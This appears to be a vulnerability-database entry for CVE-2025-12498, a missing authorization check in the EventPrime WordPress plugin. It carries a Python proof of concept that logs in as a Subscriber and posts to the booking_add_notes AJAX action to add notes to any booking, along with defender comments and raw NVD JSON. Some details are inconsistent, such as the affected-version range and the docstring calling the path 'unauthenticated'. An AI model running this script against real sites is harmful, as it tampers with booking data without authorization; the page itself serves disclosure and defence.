Security Vulnerability Report
CVE-2025-12498 CVSS 4.3 MEDIUM

CVE-2025-12498

Published: 2025-11-08 07:15:36
Last Modified: 2026-04-15 00:35:42

Description

The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized booking note creation due to a missing capability check on the 'booking_add_notes' function in all versions up to, and including, 4.2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add a note to the backend view of any booking.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

EventPrime – Events Calendar, Bookings and Tickets < 4.2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
# CVE-2025-12498 PoC - EventPrime Unauthorized Booking Note Addition
# Author: Security Researcher
# Target: WordPress with EventPrime plugin <= 4.2.0.0
#
# Root cause per the advisory: the 'booking_add_notes' AJAX handler
# (includes/class-ep-ajax.php, see the trac reference in the raw JSON) lacks a
# capability check (CWE-862). Any logged-in account, Subscriber and up, can
# therefore append a note to any booking's backend view. The script below only
# reproduces that single request; it does not escalate beyond adding a note.
#
# Defender notes:
#   - The remediation is a server-side authorization check in the handler
#     (e.g. current_user_can() for the role that manages bookings); a nonce
#     check alone (check_ajax_referer()) is not a substitute, because a
#     Subscriber can obtain a valid nonce from a page they are allowed to load.
#     The fix changeset referenced in the raw JSON presumably adds such a check
#     -- verify against the plugin source for your installed version.
#   - Log/WAF detection can key on POST /wp-admin/admin-ajax.php with
#     action=booking_add_notes originating from a session whose user lacks the
#     booking-management capability.
import requests
import sys
from urllib.parse import urlencode  # imported but never used in this script


def exploit_unauthorized_booking_note(
    target_url: str,
    username: str,
    password: str,
    booking_id: str,
    note_content: str,
) -> bool:
    """
    Exploits CVE-2025-12498: Missing authorization check in booking_add_notes function

    The check performed here is a *reachability* test of the unauthenticated-
    capability code path: it authenticates as a low-privilege user, submits one
    note, and reports whether the server appears to have accepted it.

    Args:
        target_url: Base URL of the WordPress site (scheme + host, no trailing slash;
            it is concatenated directly with "/wp-login.php" below)
        username: WordPress username with Subscriber+ role
        password: WordPress password
        booking_id: Target booking ID to add note to (passed through as a form
            field; the CLI entry point supplies it as a string)
        note_content: Malicious note content to inject

    Returns:
        bool: True if exploitation appears successful, False otherwise.
        Note that the second, text-based success heuristic (see Step 3) is weak
        and can return True on a patched target; treat a True from that branch
        as inconclusive.
    """
    session = requests.Session()

    # Step 1: Login to WordPress to obtain authentication cookies
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    # login_response is never inspected; login success is inferred solely from
    # the presence of a 'wordpress_logged_in*' cookie in the session jar.
    login_response = session.post(login_url, data=login_data, allow_redirects=True)
    if 'wordpress_logged_in' not in str(session.cookies.get_dict()):
        print("[-] Login failed. Check credentials.")
        return False
    print("[+] Login successful. Subscriber-level account authenticated.")

    # Step 2: Exploit the vulnerability by sending malicious booking note request
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'booking_add_notes',
        'booking_id': booking_id,
        'notes': note_content,
        'ep_ajax_call': 'true',
        # A placeholder nonce is sent on purpose: a handler that validated the
        # nonce and the caller's capability would reject this request, so a
        # success response is the observable symptom of the missing check.
        'security': 'dummy'  # In vulnerable version, security check is missing
    }
    exploit_response = session.post(ajax_url, data=exploit_data)

    # Step 3: Analyze response
    # NOTE(review): the nesting of the fallback check below was recovered from a
    # collapsed listing; confirm against the original file.
    if exploit_response.status_code == 200:
        try:
            response_json = exploit_response.json()
            if response_json.get('success') or 'note added' in str(response_json).lower():
                print(f"[+] VULNERABLE! Successfully added note to booking #{booking_id}")
                print(f"[+] Note content: {note_content}")
                print("[+] Attacker can now modify any booking's notes without proper authorization.")
                return True
        except:
            # Bare except: swallows JSON decode errors (the intended case) but
            # also everything else, including KeyboardInterrupt; the script then
            # falls through to the text heuristic below.
            pass
        # Weak heuristic: '1' appears in almost any HTML or JSON body (admin-ajax
        # returns '0' for unknown actions but many other responses contain a
        # '1'), so this branch has a high false-positive rate.
        if '1' in exploit_response.text or 'success' in exploit_response.text.lower():
            print(f"[+] VULNERABLE! Successfully added note to booking #{booking_id}")
            return True
    print("[-] Exploitation failed or target is patched.")
    return False


if __name__ == "__main__":
    # CLI entry point: five positional arguments, all forwarded as strings.
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-12498_poc.py <target_url> <username> <password> <booking_id> <note>")
        print("Example: python cve-2025-12498_poc.py http://example.com subscriber password 123 'Malicious note'")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    bid = sys.argv[4]
    note = sys.argv[5]
    exploit_unauthorized_booking_note(target, user, pwd, bid, note)

References

Raw JSON Data

{"cve": {"id": "CVE-2025-12498", "sourceIdentifier": "[email protected]", "published": "2025-11-08T07:15:36.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized booking note creation due to a missing capability check on the 'booking_add_notes' function in all versions up to, and including, 4.2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add a note to the backend view of any booking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L638", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3389496/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d32f7e98-8203-400e-bc26-4556ddba2510?source=cve", "source": "[email protected]"}]}}